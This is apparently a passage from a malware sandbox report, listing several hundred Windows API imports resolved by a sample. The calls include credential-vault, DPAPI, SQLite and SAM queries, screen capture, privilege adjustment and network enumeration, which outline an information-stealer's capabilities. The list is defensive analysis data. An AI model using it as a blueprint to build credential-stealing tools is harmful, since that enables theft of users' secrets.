2689. "kernel32.dll.GetCurrentProcessId",
2690. "kernel32.dll.GetLocalTime",
2691. "kernel32.dll.GetCurrentProcess",
2692. "kernel32.dll.WTSGetActiveConsoleSessionId",
2693. "kernel32.dll.WideCharToMultiByte",
2694. "kernel32.dll.CreateFileMappingW",
2695. "kernel32.dll.MapViewOfFile",
2696. "kernel32.dll.UnmapViewOfFile",
2697. "kernel32.dll.MultiByteToWideChar",
2698. "kernel32.dll.GetExitCodeProcess",
2699. "kernel32.dll.ResumeThread",
2700. "kernel32.dll.DeleteFileW",
2701. "kernel32.dll.CreateDirectoryW",
2702. "kernel32.dll.GetTempPathA",
2703. "kernel32.dll.HeapAlloc",
2704. "kernel32.dll.CloseHandle",
2705. "kernel32.dll.lstrlenA",
2706. "kernel32.dll.GetProcessHeap",
2707. "kernel32.dll.HeapFree",
2708. "kernel32.dll.lstrcatA",
2709. "kernel32.dll.GetLastError",
2710. "ws2_32.dll.#12",
2711. "ntdll.dll.RtlGetVersion",
2712. "ntdll.dll.ZwQuerySystemInformation",
2713. "ntdll.dll.RtlLargeIntegerDivide",
2714. "shell32.dll.SHGetFolderPathW",
2715. "iphlpapi.dll.GetAdaptersInfo",
2716. "ole32.dll.CoCreateInstance",
2717. "ole32.dll.CoInitializeEx",
2718. "winhttp.dll.WinHttpOpen",
2719. "winhttp.dll.WinHttpCrackUrl",
2720. "winhttp.dll.WinHttpReceiveResponse",
2721. "winhttp.dll.WinHttpCloseHandle",
2722. "winhttp.dll.WinHttpSendRequest",
2723. "winhttp.dll.WinHttpConnect",
2724. "winhttp.dll.WinHttpOpenRequest",
2725. "winhttp.dll.WinHttpSetOption",
2726. "winhttp.dll.WinHttpQueryDataAvailable",
2727. "winhttp.dll.WinHttpReadData",
2728. "winhttp.dll.WinHttpQueryHeaders",
2729. "advapi32.dll.GetSidSubAuthority",
2730. "advapi32.dll.RegSetValueExA",
2731. "advapi32.dll.RegQueryValueExA",
2732. "advapi32.dll.RegOpenKeyA",
2733. "advapi32.dll.RegDeleteKeyA",
2734. "advapi32.dll.RegCreateKeyA",
2735. "advapi32.dll.RegCloseKey",
2736. "advapi32.dll.CryptVerifySignatureA",
2737. "advapi32.dll.CryptDestroyKey",
2738. "advapi32.dll.LookupPrivilegeValueA",
2739. "advapi32.dll.AdjustTokenPrivileges",
2740. "advapi32.dll.CreateProcessAsUserW",
2741. "advapi32.dll.GetTokenInformation",
2742. "advapi32.dll.GetSidSubAuthorityCount",
2743. "advapi32.dll.CryptReleaseContext",
2744. "advapi32.dll.GetSidIdentifierAuthority",
2745. "advapi32.dll.OpenProcessToken",
2746. "advapi32.dll.CryptAcquireContextW",
2747. "advapi32.dll.LookupAccountNameW",
2748. "advapi32.dll.GetUserNameW",
2749. "advapi32.dll.CryptDestroyHash",
2750. "advapi32.dll.CryptHashData",
2751. "advapi32.dll.CryptCreateHash",
2752. "advapi32.dll.CryptGetHashParam",
2753. "advapi32.dll.InitiateSystemShutdownExA",
2754. "sechost.dll.LookupAccountNameLocalW",
2755. "advapi32.dll.LsaOpenPolicy",
2756. "advapi32.dll.LsaQueryInformationPolicy",
2757. "netutils.dll.NetApiBufferAllocate",
2758. "advapi32.dll.LsaFreeMemory",
2759. "advapi32.dll.LsaClose",
2760. "netutils.dll.NetApiBufferFree",
2761. "cryptbase.dll.SystemFunction036",
2762. "sspicli.dll.GetUserNameExW",
2763. "xmllite.dll.CreateXmlWriter",
2764. "xmllite.dll.CreateXmlWriterOutputWithEncodingName",
2765. "oleaut32.dll.#500",
2766. "wkscli.dll.NetWkstaGetInfo",
2767. "cscapi.dll.CscNetApiGetInterface",
2768. "ws2_32.dll.GetAddrInfoW",
2769. "rpcrt4.dll.RpcBindingFree",
2770. "ws2_32.dll.WSASocketW",
2771. "ws2_32.dll.#2",
2772. "ws2_32.dll.#21",
2773. "ws2_32.dll.#9",
2774. "ws2_32.dll.WSAIoctl",
2775. "ws2_32.dll.FreeAddrInfoW",
2776. "ws2_32.dll.WSAGetOverlappedResult",
2777. "ws2_32.dll.#6",
2778. "ws2_32.dll.#5",
2779. "schannel.dll.SpUserModeInitialize",
2780. "advapi32.dll.RegCreateKeyExW",
2781. "advapi32.dll.RegQueryValueExW",
2782. "ws2_32.dll.WSASend",
2783. "ws2_32.dll.WSARecv",
2784. "secur32.dll.FreeContextBuffer",
2785. "ncrypt.dll.SslOpenProvider",
2786. "ncrypt.dll.GetSChannelInterface",
2787. "bcryptprimitives.dll.GetHashInterface",
2788. "ncrypt.dll.SslIncrementProviderReferenceCount",
2789. "ncrypt.dll.SslImportKey",
2790. "bcryptprimitives.dll.GetCipherInterface",
2791. "ncrypt.dll.SslLookupCipherSuiteInfo",
2792. "user32.dll.LoadStringW",
2793. "ncrypt.dll.BCryptOpenAlgorithmProvider",
2794. "ncrypt.dll.BCryptGetProperty",
2795. "ncrypt.dll.BCryptCreateHash",
2796. "ncrypt.dll.BCryptHashData",
2797. "ncrypt.dll.BCryptFinishHash",
2798. "ncrypt.dll.BCryptDestroyHash",
2799. "crypt32.dll.CertGetCertificateChain",
2800. "userenv.dll.GetUserProfileDirectoryW",
2801. "sechost.dll.ConvertSidToStringSidW",
2802. "sechost.dll.ConvertStringSidToSidW",
2803. "userenv.dll.RegisterGPNotification",
2804. "gpapi.dll.RegisterGPNotificationInternal",
2805. "sechost.dll.OpenSCManagerW",
2806. "sechost.dll.OpenServiceW",
2807. "sechost.dll.CloseServiceHandle",
2808. "sechost.dll.QueryServiceConfigW",
2809. "bcryptprimitives.dll.GetAsymmetricEncryptionInterface",
2810. "ncrypt.dll.BCryptImportKeyPair",
2811. "ncrypt.dll.BCryptVerifySignature",
2812. "ncrypt.dll.BCryptDestroyKey",
2813. "cryptnet.dll.CryptRetrieveObjectByUrlW",
2814. "setupapi.dll.SetupIterateCabinetW",
2815. "kernel32.dll.RegOpenKeyExW",
2816. "kernel32.dll.RegCloseKey",
2817. "cabinet.dll.#20",
2818. "cabinet.dll.#22",
2819. "devrtl.dll.DevRtlGetThreadLogToken",
2820. "cabinet.dll.#23",
2821. "cryptsp.dll.CryptCreateHash",
2822. "cryptsp.dll.CryptSetHashParam",
2823. "cryptsp.dll.CryptVerifySignatureA",
2824. "cryptsp.dll.CryptDestroyKey",
2825. "cryptsp.dll.CryptDestroyHash",
2826. "cryptsp.dll.CryptHashData",
2827. "sechost.dll.QueryServiceConfigA",
2828. "sechost.dll.QueryServiceStatus",
2829. "rpcrt4.dll.RpcStringBindingComposeA",
2830. "rpcrt4.dll.RpcBindingFromStringBindingA",
2831. "rpcrt4.dll.RpcEpResolveBinding",
2832. "sechost.dll.LookupAccountSidLocalW",
2833. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
2834. "rpcrt4.dll.RpcStringFreeA",
2835. "rpcrt4.dll.NdrClientCall2",
2836. "cryptnet.dll.I_CryptNetGetConnectivity",
2837. "sensapi.dll.IsNetworkAlive",
2838. "rpcrt4.dll.RpcBindingFromStringBindingW",
2839. "winhttp.dll.WinHttpSetTimeouts",
2840. "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
2841. "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
2842. "winhttp.dll.WinHttpTimeFromSystemTime",
2843. "cryptnet.dll.I_CryptNetSetUrlCacheFlushInfo",
2844. "cryptnet.dll.I_CryptNetSetUrlCachePreFetchInfo",
2845. "crypt32.dll.CertVerifyCertificateChainPolicy",
2846. "crypt32.dll.CertFreeCertificateChain",
2847. "crypt32.dll.CertDuplicateCertificateContext",
2848. "ncrypt.dll.SslEncryptPacket",
2849. "ncrypt.dll.SslDecryptPacket",
2850. "crypt32.dll.CertFreeCertificateContext",
2851. "cryptsp.dll.CryptAcquireContextW",
2852. "cryptsp.dll.CryptReleaseContext",
2853. "ws2_32.dll.#116",
2854. "ole32.dll.CoUninitialize",
2855. "rasapi32.dll.RasEnumConnectionsW",
2856. "rasapi32.dll.RasConnectionNotificationW",
2857. "advapi32.dll.WmiMofEnumerateResourcesW",
2858. "advapi32.dll.WmiFreeBuffer",
2859. "advapi32.dll.WmiCloseBlock",
2860. "propsys.dll.PropVariantToVariant",
2861. "wbemcore.dll.Shutdown",
2862. "advapi32.dll.UnregisterTraceGuids",
2863. "tschannel.dll.DllGetClassObject",
2864. "tschannel.dll.DllCanUnloadNow",
2865. "kernel32.dll.FlsAlloc",
2866. "kernel32.dll.FlsGetValue",
2867. "kernel32.dll.FlsSetValue",
2868. "kernel32.dll.FlsFree",
2869. "kernel32.dll.IsProcessorFeaturePresent",
2870. "kernel32.dll.VirtualAlloc",
2871. "ntdll.dll.memcpy",
2872. "ole32.dll.CLSIDFromProgID",
2873. "oleaut32.dll.#9",
2874. "oleaut32.dll.#6",
2875. "oleaut32.dll.#15",
2876. "oleaut32.dll.#26",
2877. "oleaut32.dll.#19",
2878. "oleaut32.dll.#20",
2879. "netapi32.dll.DsGetDcNameW",
2880. "oleaut32.dll.#16",
2881. "ws2_32.dll.#52",
2882. "ws2_32.dll.#23",
2883. "ws2_32.dll.#11",
2884. "ws2_32.dll.#4",
2885. "ws2_32.dll.#115",
2886. "ws2_32.dll.#22",
2887. "ws2_32.dll.#16",
2888. "ws2_32.dll.#10",
2889. "ws2_32.dll.#111",
2890. "ws2_32.dll.#19",
2891. "ws2_32.dll.#18",
2892. "ws2_32.dll.#3",
2893. "ws2_32.dll.#112",
2894. "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorA",
2895. "kernel32.dll.OpenFileMappingW",
2896. "kernel32.dll.WaitForMultipleObjects",
2897. "kernel32.dll.TerminateProcess",
2898. "kernel32.dll.SetEnvironmentVariableA",
2899. "kernel32.dll.GetTickCount64",
2900. "kernel32.dll.TerminateThread",
2901. "kernel32.dll.CreatePipe",
2902. "advapi32.dll.CryptGenKey",
2903. "shlwapi.dll.StrCmpNIA",
2904. "shlwapi.dll.StrToIntA",
2905. "shlwapi.dll.PathFindFileNameA",
2906. "shlwapi.dll.StrToIntExA",
2907. "oleaut32.dll.#4",
2908. "oleaut32.dll.#7",
2909. "gdi32.dll.SelectObject",
2910. "gdi32.dll.GetStockObject",
2911. "gdi32.dll.Ellipse",
2912. "gdi32.dll.DeleteObject",
2913. "gdi32.dll.DeleteDC",
2914. "gdi32.dll.CreatePen",
2915. "gdi32.dll.CreateCompatibleDC",
2916. "gdi32.dll.BitBlt",
2917. "gdi32.dll.CreateCompatibleBitmap",
2918. "crypt32.dll.CryptSignAndEncodeCertificate",
2919. "crypt32.dll.CertGetCertificateContextProperty",
2920. "crypt32.dll.CertSetCertificateContextProperty",
2921. "crypt32.dll.CertCreateCertificateContext",
2922. "crypt32.dll.CertStrToNameA",
2923. "crypt32.dll.CryptExportPublicKeyInfoEx",
2924. "crypt32.dll.CryptEncodeObject",
2925. "crypt32.dll.CertCreateSelfSignCertificate",
2926. "crypt32.dll.CertGetNameStringA",
2927. "crypt32.dll.CertGetIntendedKeyUsage",
2928. "crypt32.dll.CertControlStore",
2929. "crypt32.dll.CertAddCertificateContextToStore",
2930. "crypt32.dll.CertEnumCertificatesInStore",
2931. "crypt32.dll.CertCloseStore",
2932. "crypt32.dll.CertOpenStore",
2933. "ws2_32.dll.WSACreateEvent",
2934. "ws2_32.dll.#13",
2935. "ws2_32.dll.#1",
2936. "ws2_32.dll.WSAEnumNetworkEvents",
2937. "ws2_32.dll.WSAEventSelect",
2938. "ntdll.dll.RtlTimeToSecondsSince1970",
2939. "ntdll.dll.NtQueryInformationProcess",
2940. "user32.dll.GetWindowRect",
2941. "user32.dll.GetDesktopWindow",
2942. "user32.dll.GetForegroundWindow",
2943. "user32.dll.GetCursorPos",
2944. "user32.dll.ReleaseDC",
2945. "user32.dll.GetWindowDC",
2946. "user32.dll.CharLowerA",
2947. "kernel32.dll.OpenProcess",
2948. "kernel32.dll.lstrcmpiA",
2949. "kernel32.dll.OpenEventA",
2950. "kernel32.dll.SystemTimeToFileTime",
2951. "kernel32.dll.SleepEx",
2952. "kernel32.dll.QueueUserAPC",
2953. "kernel32.dll.RegisterWaitForSingleObject",
2954. "kernel32.dll.UnregisterWait",
2955. "kernel32.dll.GetSystemTime",
2956. "kernel32.dll.GetTempPathW",
2957. "kernel32.dll.GetModuleHandleA",
2958. "kernel32.dll.CreateEventA",
2959. "kernel32.dll.DeleteCriticalSection",
2960. "kernel32.dll.LeaveCriticalSection",
2961. "kernel32.dll.EnterCriticalSection",
2962. "kernel32.dll.InitializeCriticalSection",
2963. "kernel32.dll.IsWow64Process",
2964. "kernel32.dll.ReadProcessMemory",
2965. "gdiplus.dll.GdipDisposeImage",
2966. "gdiplus.dll.GdipSaveImageToFile",
2967. "gdiplus.dll.GdipCreateBitmapFromHBITMAP",
2968. "gdiplus.dll.GdiplusStartup",
2969. "secur32.dll.InitSecurityInterfaceA",
2970. "cryptsp.dll.CryptGetHashParam",
2971. "cryptsp.dll.CryptGenKey",
2972. "ole32.dll.CoGetClassObject",
2973. "ole32.dll.CoGetMarshalSizeMax",
2974. "ole32.dll.CoMarshalInterface",
2975. "ole32.dll.CoUnmarshalInterface",
2976. "ole32.dll.StringFromIID",
2977. "ole32.dll.CoGetPSClsid",
2978. "ole32.dll.CoTaskMemAlloc",
2979. "ole32.dll.CoTaskMemFree",
2980. "ole32.dll.CoReleaseMarshalData",
2981. "ole32.dll.DcomChannelSetHResult",
2982. "vbscript.dll.DllGetClassObject",
2983. "vbscript.dll.DllCanUnloadNow",
2984. "sxs.dll.SxsOleAut32RedirectTypeLibrary",
2985. "advapi32.dll.RegOpenKeyW",
2986. "advapi32.dll.RegQueryValueW",
2987. "sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid",
2988. "oleaut32.dll.DllGetClassObject",
2989. "oleaut32.dll.DllCanUnloadNow",
2990. "sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID",
2991. "oleaut32.dll.BSTR_UserSize",
2992. "oleaut32.dll.BSTR_UserMarshal",
2993. "oleaut32.dll.BSTR_UserUnmarshal",
2994. "oleaut32.dll.BSTR_UserFree",
2995. "oleaut32.dll.VARIANT_UserSize",
2996. "oleaut32.dll.VARIANT_UserMarshal",
2997. "oleaut32.dll.VARIANT_UserUnmarshal",
2998. "oleaut32.dll.VARIANT_UserFree",
2999. "oleaut32.dll.LPSAFEARRAY_UserSize",
3000. "oleaut32.dll.LPSAFEARRAY_UserMarshal",
3001. "oleaut32.dll.LPSAFEARRAY_UserUnmarshal",
3002. "oleaut32.dll.LPSAFEARRAY_UserFree",
3003. "cryptsp.dll.CryptGetUserKey",
3004. "ncrypt.dll.NCryptIsKeyHandle",
3005. "cryptsp.dll.CryptExportKey",
3006. "rpcrt4.dll.UuidCreate",
3007. "cryptsp.dll.CryptSignHashA",
3008. "kernel32.dll.InitializeCriticalSectionAndSpinCount",
3009. "user32.dll.NotifyWinEvent",
3010. "kernel32.dll.CreateFileMappingA",
3011. "kernel32.dll.Wow64EnableWow64FsRedirection",
3012. "advapi32.dll.RegCreateKeyW",
3013. "advapi32.dll.RegOpenKeyExW",
3014. "advapi32.dll.RegSetValueExW",
3015. "shell32.dll.ShellExecuteA",
3016. "ole32.dll.OleInitialize",
3017. "ole32.dll.CreateBindCtx",
3018. "propsys.dll.PSCreateMemoryPropertyStore",
3019. "propsys.dll.PSPropertyBag_WriteDWORD",
3020. "ole32.dll.CoGetApartmentType",
3021. "ole32.dll.CoRegisterInitializeSpy",
3022. "comctl32.dll.#236",
3023. "ole32.dll.CoGetMalloc",
3024. "propsys.dll.PSPropertyBag_ReadDWORD",
3025. "propsys.dll.PSPropertyBag_ReadGUID",
3026. "comctl32.dll.#320",
3027. "comctl32.dll.#324",
3028. "comctl32.dll.#323",
3029. "advapi32.dll.RegEnumKeyW",
3030. "advapi32.dll.OpenThreadToken",
3031. "ole32.dll.StringFromGUID2",
3032. "apphelp.dll.ApphelpCheckShellObject",
3033. "urlmon.dll.CreateUri",
3034. "kernel32.dll.InitializeSRWLock",
3035. "kernel32.dll.AcquireSRWLockExclusive",
3036. "kernel32.dll.AcquireSRWLockShared",
3037. "kernel32.dll.ReleaseSRWLockExclusive",
3038. "kernel32.dll.ReleaseSRWLockShared",
3039. "comctl32.dll.#328",
3040. "comctl32.dll.#334",
3041. "oleaut32.dll.#2",
3042. "shell32.dll.#102",
3043. "propsys.dll.PSPropertyBag_ReadStrAlloc",
3044. "advapi32.dll.InitializeSecurityDescriptor",
3045. "advapi32.dll.SetEntriesInAclW",
3046. "ntmarta.dll.GetMartaExtensionInterface",
3047. "advapi32.dll.SetSecurityDescriptorDacl",
3048. "advapi32.dll.IsTextUnicode",
3049. "comctl32.dll.#332",
3050. "comctl32.dll.#338",
3051. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
3052. "comctl32.dll.#339",
3053. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
3054. "comctl32.dll.#386",
3055. "profapi.dll.#104",
3056. "propsys.dll.#430",
3057. "advapi32.dll.RegGetValueW",
3058. "ole32.dll.CoTaskMemRealloc",
3059. "propsys.dll.InitPropVariantFromStringAsVector",
3060. "propsys.dll.PSCoerceToCanonicalValue",
3061. "propsys.dll.PropVariantToStringAlloc",
3062. "ole32.dll.PropVariantClear",
3063. "ole32.dll.CoAllowSetForegroundWindow",
3064. "advapi32.dll.SaferGetPolicyInformation",
3065. "ntdll.dll.RtlDllShutdownInProgress",
3066. "comctl32.dll.#329",
3067. "ole32.dll.OleUninitialize",
3068. "ole32.dll.CoRevokeInitializeSpy",
3069. "comctl32.dll.#388",
3070. "comctl32.dll.#321",
3071. "kernel32.dll.SetThreadUILanguage",
3072. "kernel32.dll.CopyFileExW",
3073. "kernel32.dll.IsDebuggerPresent",
3074. "kernel32.dll.SetConsoleInputExeNameW",
3075. "shell32.dll.#66",
3076. "comctl32.dll.#385",
3077. "comctl32.dll.#336",
3078. "comctl32.dll.#333",
3079. "linkinfo.dll.IsValidLinkInfo",
3080. "propsys.dll.#417",
3081. "propsys.dll.PSGetNameFromPropertyKey",
3082. "propsys.dll.PSStringFromPropertyKey",
3083. "propsys.dll.InitVariantFromBuffer",
3084. "propsys.dll.PropVariantToGUID",
3085. "linkinfo.dll.CreateLinkInfoW",
3086. "user32.dll.IsCharAlphaW",
3087. "user32.dll.CharPrevW",
3088. "ntshrui.dll.GetNetResourceFromLocalPathW",
3089. "srvcli.dll.NetShareEnum",
3090. "slc.dll.SLGetWindowsInformationDWORD",
3091. "shlwapi.dll.PathRemoveFileSpecW",
3092. "linkinfo.dll.DestroyLinkInfo",
3093. "propsys.dll.PropVariantToBoolean",
3094. "cryptsp.dll.CryptGenRandom",
3095. "advapi32.dll.GetSecurityInfo",
3096. "advapi32.dll.SetSecurityInfo",
3097. "advapi32.dll.GetSecurityDescriptorControl",
3098. "advapi32.dll.RegQueryInfoKeyW",
3099. "advapi32.dll.RegEnumKeyExW",
3100. "advapi32.dll.RegEnumValueW",
3101. "shlwapi.dll.UrlIsW",
3102. "msvcrt.dll._set_error_mode",
3103. "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
3104. "kernel32.dll.FindActCtxSectionStringW",
3105. "kernel32.dll.GetSystemWindowsDirectoryW",
3106. "mscoree.dll.GetProcessExecutableHeap",
3107. "mscorwks.dll.DllGetClassObjectInternal",
3108. "mscorwks.dll.GetCLRFunction",
3109. "advapi32.dll.RegisterTraceGuidsW",
3110. "advapi32.dll.GetTraceLoggerHandle",
3111. "advapi32.dll.GetTraceEnableLevel",
3112. "advapi32.dll.GetTraceEnableFlags",
3113. "advapi32.dll.TraceEvent",
3114. "mscoree.dll.IEE",
3115. "mscorwks.dll.IEE",
3116. "mscoree.dll.GetStartupFlags",
3117. "mscoree.dll.GetHostConfigurationFile",
3118. "mscoree.dll.GetCORSystemDirectory",
3119. "ntdll.dll.RtlVirtualUnwind",
3120. "advapi32.dll.AllocateAndInitializeSid",
3121. "advapi32.dll.InitializeAcl",
3122. "advapi32.dll.AddAccessAllowedAce",
3123. "advapi32.dll.FreeSid",
3124. "kernel32.dll.SetThreadStackGuarantee",
3125. "kernel32.dll.AddVectoredContinueHandler",
3126. "kernel32.dll.RemoveVectoredContinueHandler",
3127. "advapi32.dll.ConvertSidToStringSidW",
3128. "kernel32.dll.FlushProcessWriteBuffers",
3129. "kernel32.dll.GetWriteWatch",
3130. "kernel32.dll.ResetWriteWatch",
3131. "kernel32.dll.CreateMemoryResourceNotification",
3132. "kernel32.dll.QueryMemoryResourceNotification",
3133. "kernel32.dll.GlobalMemoryStatusEx",
3134. "ole32.dll.CoGetContextToken",
3135. "oleaut32.dll.#149",
3136. "kernel32.dll.GetUserDefaultUILanguage",
3137. "kernel32.dll.GetVersionExW",
3138. "kernel32.dll.GetFullPathNameW",
3139. "kernel32.dll.GetFileAttributesExW",
3140. "version.dll.GetFileVersionInfoSizeW",
3141. "version.dll.GetFileVersionInfoW",
3142. "version.dll.VerQueryValueW",
3143. "kernel32.dll.lstrlen",
3144. "mscoree.dll.ND_RI2",
3145. "kernel32.dll.lstrcpy",
3146. "version.dll.VerLanguageNameW",
3147. "advapi32.dll.LookupPrivilegeValueW",
3148. "psapi.dll.EnumProcessModules",
3149. "psapi.dll.GetModuleInformation",
3150. "psapi.dll.GetModuleBaseNameW",
3151. "psapi.dll.GetModuleFileNameExW",
3152. "ntdll.dll.NtQuerySystemInformation",
3153. "user32.dll.EnumWindows",
3154. "user32.dll.GetWindowThreadProcessId",
3155. "kernel32.dll.WerSetFlags",
3156. "kernel32.dll.SetThreadPreferredUILanguages",
3157. "kernel32.dll.GetThreadPreferredUILanguages",
3158. "kernel32.dll.GetUserDefaultLocaleName",
3159. "kernel32.dll.GetEnvironmentVariableW",
3160. "advapi32.dll.CryptExportKey",
3161. "advapi32.dll.CryptGetKeyParam",
3162. "advapi32.dll.CryptSignHashA",
3163. "advapi32.dll.CryptGetProvParam",
3164. "advapi32.dll.CryptGetUserKey",
3165. "advapi32.dll.CryptEnumProvidersA",
3166. "mscoree.dll.GetTokenForVTableEntry",
3167. "mscoree.dll.SetTargetForVTableEntry",
3168. "mscoree.dll.GetTargetForVTableEntry",
3169. "culture.dll.ConvertLangIdToCultureName",
3170. "ole32.dll.CoCreateGuid",
3171. "kernel32.dll.GetConsoleScreenBufferInfo",
3172. "kernel32.dll.LocalFree",
3173. "kernel32.dll.LocalAlloc",
3174. "mscoree.dll.ND_RI4",
3175. "advapi32.dll.DuplicateTokenEx",
3176. "advapi32.dll.CheckTokenMembership",
3177. "kernel32.dll.GetConsoleTitleW",
3178. "mscorjit.dll.getJit",
3179. "kernel32.dll.SetConsoleTitleW",
3180. "kernel32.dll.SetConsoleCtrlHandler",
3181. "ntdll.dll.WinSqmIsOptedIn",
3182. "kernel32.dll.ExpandEnvironmentStringsW",
3183. "shfolder.dll.SHGetFolderPathW",
3184. "kernel32.dll.SetEnvironmentVariableW",
3185. "kernel32.dll.GetACP",
3186. "kernel32.dll.GetFileType",
3187. "kernel32.dll.GetSystemInfo",
3188. "kernel32.dll.VirtualQuery",
3189. "kernel32.dll.ReleaseMutex",
3190. "advapi32.dll.RegisterEventSourceW",
3191. "advapi32.dll.DeregisterEventSource",
3192. "advapi32.dll.ReportEventW",
3193. "kernel32.dll.GetLogicalDrives",
3194. "kernel32.dll.GetDriveTypeW",
3195. "kernel32.dll.GetVolumeInformationW",
3196. "kernel32.dll.GetCurrentDirectoryW",
3197. "kernel32.dll.GetStdHandle",
3198. "kernel32.dll.GetConsoleMode",
3199. "kernel32.dll.FindFirstFileW",
3200. "kernel32.dll.FindClose",
3201. "mscoree.dll.DllGetClassObject",
3202. "diasymreader.dll.DllGetClassObjectInternal",
3203. "kernel32.dll.GetConsoleOutputCP",
3204. "gdi32.dll.TranslateCharsetInfo",
3205. "kernel32.dll.SetConsoleTextAttribute",
3206. "kernel32.dll.WriteConsoleW",
3207. "mscoree.dll.CorExitProcess",
3208. "mscorwks.dll.CorExitProcess",
3209. "mscorwks.dll._CorDllMain",
3210. "kernel32.dll.CreateActCtxW",
3211. "kernel32.dll.AddRefActCtx",
3212. "kernel32.dll.ReleaseActCtx",
3213. "kernel32.dll.ActivateActCtx",
3214. "kernel32.dll.DeactivateActCtx",
3215. "kernel32.dll.GetCurrentActCtx",
3216. "kernel32.dll.QueryActCtxW",
3217. "kernel32.dll.VirtualFree",
3218. "kernel32.dll.VirtualProtect",
3219. "kernel32.dll.LCMapStringEx",
3220. "kernel32.dll.InitializeConditionVariable",
3221. "kernel32.dll.SleepConditionVariableCS",
3222. "kernel32.dll.WakeAllConditionVariable",
3223. "kernelbase.dll.CompareStringEx",
3224. "kernel32.dll.GetLocaleInfoEx",
3225. "ntdll.dll.RtlGetNtVersionNumbers",
3226. "drprov.dll.NPGetCaps",
3227. "drprov.dll.NPAddConnection",
3228. "drprov.dll.NPAddConnection3",
3229. "drprov.dll.NPCancelConnection",
3230. "drprov.dll.NPGetConnection",
3231. "drprov.dll.NPGetUniversalName",
3232. "drprov.dll.NPOpenEnum",
3233. "drprov.dll.NPEnumResource",
3234. "drprov.dll.NPCloseEnum",
3235. "drprov.dll.NPGetResourceParent",
3236. "drprov.dll.NPGetResourceInformation",
3237. "ntlanman.dll.NPGetCaps",
3238. "ntlanman.dll.NPGetUser",
3239. "ntlanman.dll.NPAddConnection",
3240. "ntlanman.dll.NPAddConnection3",
3241. "ntlanman.dll.NPGetReconnectFlags",
3242. "ntlanman.dll.NPCancelConnection",
3243. "ntlanman.dll.NPGetConnection",
3244. "ntlanman.dll.NPGetConnection3",
3245. "ntlanman.dll.NPGetUniversalName",
3246. "ntlanman.dll.NPGetConnectionPerformance",
3247. "ntlanman.dll.NPOpenEnum",
3248. "ntlanman.dll.NPEnumResource",
3249. "ntlanman.dll.NPCloseEnum",
3250. "ntlanman.dll.NPFormatNetworkName",
3251. "ntlanman.dll.NPGetResourceParent",
3252. "ntlanman.dll.NPGetResourceInformation",
3253. "davclnt.dll.NPGetCaps",
3254. "davclnt.dll.NPGetUser",
3255. "davclnt.dll.NPAddConnection",
3256. "davclnt.dll.NPAddConnection3",
3257. "davclnt.dll.NPCancelConnection",
3258. "davclnt.dll.NPGetConnection",
3259. "davclnt.dll.NPGetUniversalName",
3260. "davclnt.dll.NPOpenEnum",
3261. "davclnt.dll.NPEnumResource",
3262. "davclnt.dll.NPCloseEnum",
3263. "davclnt.dll.NPFormatNetworkName",
3264. "davclnt.dll.NPGetResourceParent",
3265. "davclnt.dll.NPGetResourceInformation",
3266. "advapi32.dll.LookupAccountSidW",
3267. "advapi32.dll.CreateWellKnownSid",
3268. "rpcrt4.dll.RpcStringBindingComposeW",
3269. "rpcrt4.dll.RpcStringFreeW",
3270. "browcli.dll.NetServerEnum",
3271. "wkscli.dll.NetWkstaUserGetInfo",
3272. "netutils.dll.NetpwNameCompare",
3273. "netutils.dll.NetpwNameCanonicalize",
3274. "netutils.dll.NetpwNameValidate",
3275. "rpcrt4.dll.I_RpcExceptionFilter",
3276. "ntdll.dll.RtlUnwind",
3277. "mscoree.dll._CorExeMain",
3278. "mscoree.dll._CorImageUnloading",
3279. "mscoree.dll._CorValidateImage",
3280. "kernel32.dll.SwitchToThread",
3281. "shlwapi.dll.PathFindFileNameW",
3282. "ole32.dll.CoInitialize",
3283. "shell32.dll.SHGetFolderPathA",
3284. "kernel32.dll.DeleteFileA",
3285. "kernel32.dll.CopyFileA",
3286. "kernel32.dll.FindNextFileA",
3287. "kernel32.dll.SetFilePointer",
3288. "kernel32.dll.FreeLibrary",
3289. "kernel32.dll.FindFirstFileA",
3290. "advapi32.dll.RegOpenKeyExA",
3291. "advapi32.dll.CredFree",
3292. "advapi32.dll.CredEnumerateW",
3293. "advapi32.dll.RegEnumKeyExA",
3294. "crypt32.dll.CryptUnprotectData",
3295. "propsys.dll.#407",
3296. "sqlite3.dll.sqlite3_open",
3297. "sqlite3.dll.sqlite3_exec",
3298. "sqlite3.dll.sqlite3_close",
3299. "sqlite3.dll.sqlite3_free",
3300. "vaultcli.dll.VaultEnumerateVaults",
3301. "vaultcli.dll.VaultOpenVault",
3302. "vaultcli.dll.VaultCloseVault",
3303. "vaultcli.dll.VaultEnumerateItems",
3304. "vaultcli.dll.VaultGetItem",
3305. "vaultcli.dll.VaultFree",
3306. "ncrypt.dll.SslDecrementProviderReferenceCount",
3307. "ncrypt.dll.SslFreeObject",
3308. "kernel32.dll.FormatMessageW",
3309. "kernel32.dll.LocaleNameToLCID",
3310. "kernel32.dll.LCIDToLocaleName",
3311. "kernel32.dll.GetSystemDefaultLocaleName",
3312. "fastprox.dll.DllGetClassObject",
3313. "fastprox.dll.DllCanUnloadNow",
3314. "oleaut32.dll.#283",
3315. "oleaut32.dll.#284",
3316. "psapi.dll.EnumProcesses",
3317. "ole32.dll.CoInitializeSecurity",
3318. "wmisvc.dll.ServiceMain",
3319. "sechost.dll.RegisterServiceCtrlHandlerExW",
3320. "sechost.dll.SetServiceStatus",
3321. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
3322. "advapi32.dll.WmiOpenBlock",
3323. "vssapi.dll.CreateWriter",
3324. "samcli.dll.NetLocalGroupGetMembers",
3325. "samlib.dll.SamConnect",
3326. "rpcrt4.dll.NdrClientCall3",
3327. "samlib.dll.SamOpenDomain",
3328. "samlib.dll.SamLookupNamesInDomain",
3329. "samlib.dll.SamOpenAlias",
3330. "samlib.dll.SamFreeMemory",
3331. "samlib.dll.SamCloseHandle",
3332. "samlib.dll.SamGetMembersInAlias",
3333. "samlib.dll.SamEnumerateDomainsInSamServer",
3334. "samlib.dll.SamLookupDomainInSamServer",
3335. "ole32.dll.StringFromCLSID",
3336. "propsys.dll.VariantToPropVariant",
